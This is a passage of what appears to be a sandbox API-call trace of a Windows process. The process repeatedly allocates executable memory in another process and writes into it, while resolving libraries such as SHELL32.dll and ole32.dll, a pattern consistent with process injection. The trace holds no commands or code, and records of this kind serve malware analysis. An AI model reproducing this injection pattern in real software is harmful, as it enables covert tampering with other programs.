BaseAddress=0x28de28*=0x1470000, RegionSize=0x28de48*=0x1000) returned 0x0 [0241.340] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0241.340] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0xe0000, Buffer=0x1470000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x1470000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0241.340] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0241.340] NtClearEvent (EventHandle=0x144) returned 0x0 [0241.340] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0241.341] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0241.341] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0241.341] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x1470000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0241.341] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x2001f, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0241.341] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0241.341] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x14002a038, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0241.341] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x2d, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0241.341] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20010, Buffer=0x52cb72*, NumberOfBytesToWrite=0x15, NumberOfBytesWritten=0x28df88 | out: Buffer=0x52cb72*, NumberOfBytesWritten=0x28df88*=0x15) returned 0x0 [0241.342] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0241.342] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0241.342] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x1470000, RegionSize=0x28de48*=0x1000) returned 0x0 [0241.342] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0241.343] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0xe0000, Buffer=0x1470000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x1470000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0241.343] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0241.343] NtClearEvent (EventHandle=0x144) returned 0x0 [0241.343] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0241.343] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0241.343] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0241.343] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x1470000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0241.344] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20025, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0241.344] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0241.344] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x14002a040, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0241.344] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x2c, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0241.344] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20010, Buffer=0x52cb5c*, NumberOfBytesToWrite=0x14, NumberOfBytesWritten=0x28df88 | out: Buffer=0x52cb5c*, NumberOfBytesWritten=0x28df88*=0x14) returned 0x0 [0241.344] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0241.344] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0241.345] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x1470000, RegionSize=0x28de48*=0x1000) returned 0x0 [0241.345] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0241.345] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0xe0000, Buffer=0x1470000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x1470000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0241.345] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0241.345] NtClearEvent (EventHandle=0x144) returned 0x0 [0241.345] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0241.346] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0241.346] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0241.346] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x1470000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0241.346] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20024, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0241.346] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0241.346] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x14002a048, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0241.346] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x28, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0241.346] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20010, Buffer=0x52c862*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df88 | out: Buffer=0x52c862*, NumberOfBytesWritten=0x28df88*=0x10) returned 0x0 [0241.347] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0241.347] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0241.347] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x1470000, RegionSize=0x28de48*=0x1000) returned 0x0 [0241.347] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0241.347] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0xe0000, Buffer=0x1470000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x1470000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0241.347] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0241.347] NtClearEvent (EventHandle=0x144) returned 0x0 [0241.347] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0241.348] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0241.348] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0241.348] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x1470000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0241.348] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20020, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0241.348] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0241.348] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x14002a050, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0241.348] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x24, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0241.348] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20010, Buffer=0x52c820*, NumberOfBytesToWrite=0xc, NumberOfBytesWritten=0x28df88 | out: Buffer=0x52c820*, NumberOfBytesWritten=0x28df88*=0xc) returned 0x0 [0241.349] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0241.349] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0241.349] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x1470000, RegionSize=0x28de48*=0x1000) returned 0x0 [0241.349] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0241.349] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0xe0000, Buffer=0x1470000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x1470000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0241.349] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0241.349] NtClearEvent (EventHandle=0x144) returned 0x0 [0241.349] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0241.350] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0241.350] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0241.350] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x1470000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0241.350] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x2001c, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0241.350] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0241.350] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x14002a058, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0241.350] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x52c894, cbMultiByte=-1, lpWideCharStr=0x28ddb8, cchWideChar=522 | out: lpWideCharStr="SHELL32.dll") returned 12 [0241.350] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28e008*=0x0, ZeroBits=0x0, RegionSize=0x28dd98*=0x2f, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28e008*=0x20000, RegionSize=0x28dd98*=0x1000) returned 0x0 [0241.350] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20010, Buffer=0x28ddb8*, NumberOfBytesToWrite=0x17, NumberOfBytesWritten=0x28e010 | out: Buffer=0x28ddb8*, NumberOfBytesWritten=0x28e010*=0x17) returned 0x0 [0241.350] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20000, Buffer=0x28dd70*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28dd90 | out: Buffer=0x28dd70*, NumberOfBytesWritten=0x28dd90*=0x10) returned 0x0 [0241.351] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28dc88, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28dc48 | out: Buffer=0x28dc88*, NumberOfBytesRead=0x28dc48*=0x48) returned 0x0 [0241.351] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28dc38*=0x0, ZeroBits=0x0, RegionSize=0x28dc58*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28dc38*=0x1470000, RegionSize=0x28dc58*=0x1000) returned 0x0 [0241.351] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28dc18*=0x0, ZeroBits=0x0, RegionSize=0x28dbc8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28dc18*=0xe0000, RegionSize=0x28dbc8*=0x1000) returned 0x0 [0241.351] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0xe0000, Buffer=0x1470000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28dc20 | out: Buffer=0x1470000*, NumberOfBytesWritten=0x28dc20*=0x30) returned 0x0 [0241.351] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28dc88*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28dc40 | out: Buffer=0x28dc88*, NumberOfBytesWritten=0x28dc40*=0x48) returned 0x0 [0241.351] NtClearEvent (EventHandle=0x144) returned 0x0 [0241.351] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0241.355] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28dc88, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28dc50 | out: Buffer=0x28dc88*, NumberOfBytesRead=0x28dc50*=0x48) returned 0x0 [0241.355] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28dc78*=0xe0000, RegionSize=0x28dc68, FreeType=0x8000) returned 0x0 [0241.355] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28dc70*=0x1470000, RegionSize=0x28dc60, FreeType=0x8000) returned 0x0 [0241.355] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20027, Buffer=0x28dd80, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28dd68 | out: Buffer=0x28dd80*, NumberOfBytesRead=0x28dd68*=0x8) returned 0x0 [0241.355] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28dda8*=0x20000, RegionSize=0x28dda0, FreeType=0x8000) returned 0x0 [0241.355] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x29, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0241.356] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20010, Buffer=0x52c882*, NumberOfBytesToWrite=0x11, NumberOfBytesWritten=0x28df88 | out: Buffer=0x52c882*, NumberOfBytesWritten=0x28df88*=0x11) returned 0x0 [0241.356] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0241.356] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0241.356] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x1470000, RegionSize=0x28de48*=0x1000) returned 0x0 [0241.356] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0241.356] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0xe0000, Buffer=0x1470000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x1470000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0241.356] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0241.356] NtClearEvent (EventHandle=0x144) returned 0x0 [0241.356] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0241.357] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0241.357] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0241.357] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x1470000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0241.357] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20021, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0241.357] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0241.357] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x14002a1d0, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0241.357] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x52c8ca, cbMultiByte=-1, lpWideCharStr=0x28ddb8, cchWideChar=522 | out: lpWideCharStr="ole32.dll") returned 10 [0241.357] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28e008*=0x0, ZeroBits=0x0, RegionSize=0x28dd98*=0x2b, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28e008*=0x20000, RegionSize=0x28dd98*=0x1000) returned 0x0 [0241.357] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20010, Buffer=0x28ddb8*, NumberOfBytesToWrite=0x13, NumberOfBytesWritten=0x28e010 | out: Buffer=0x28ddb8*, NumberOfBytesWritten=0x28e010*=0x13) returned 0x0 [0241.358] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20000, Buffer=0x28dd70*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28dd90 | out: Buffer=0x28dd70*, NumberOfBytesWritten=0x28dd90*=0x10) returned 0x0 [0241.358] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28dc88, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28dc48 | out: Buffer=0x28dc88*, NumberOfBytesRead=0x28dc48*=0x48) returned 0x0 [0241.358] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28dc38*=0x0, ZeroBits=0x0, RegionSize=0x28dc58*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28dc38*=0x1470000, RegionSize=0x28dc58*=0x1000) returned 0x0 [0241.358] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28dc18*=0x0, ZeroBits=0x0, RegionSize=0x28dbc8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28dc18*=0xe0000, RegionSize=0x28dbc8*=0x1000) returned 0x0 [0241.358] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0xe0000, Buffer=0x1470000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28dc20 | out: Buffer=0x1470000*, NumberOfBytesWritten=0x28dc20*=0x30) returned 0x0 [0241.358] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28dc88*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28dc40 | out: Buffer=0x28dc88*, NumberOfBytesWritten=0x28dc40*=0x48) returned 0x0 [0241.358] NtClearEvent (EventHandle=0x144) returned 0x0 [0241.358] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0241.361] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28dc88, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28dc50 | out: Buffer=0x28dc88*, NumberOfBytesRead=0x28dc50*=0x48) returned 0x0 [0241.361] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28dc78*=0xe0000, RegionSize=0x28dc68, FreeType=0x8000) returned 0x0 [0241.361] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28dc70*=0x1470000, RegionSize=0x28dc60, FreeType=0x8000) returned 0x0 [0241.361] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20023, Buffer=0x28dd80, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28dd68 | out: Buffer=0x28dd80*, NumberOfBytesRead=0x28dd68*=0x8) returned 0x0 [0241.361] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28dda8*=0x20000, RegionSize=0x28dda0, FreeType=0x8000) returned 0x0 [0241.361] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x27, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0241.361] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20010, Buffer=0x52c8ba*, NumberOfBytesToWrite=0xf, NumberOfBytesWritten=0x28df88 | out: Buffer=0x52c8ba*, NumberOfBytesWritten=0x28df88*=0xf) returned 0x0 [0241.362] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0241.362] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, 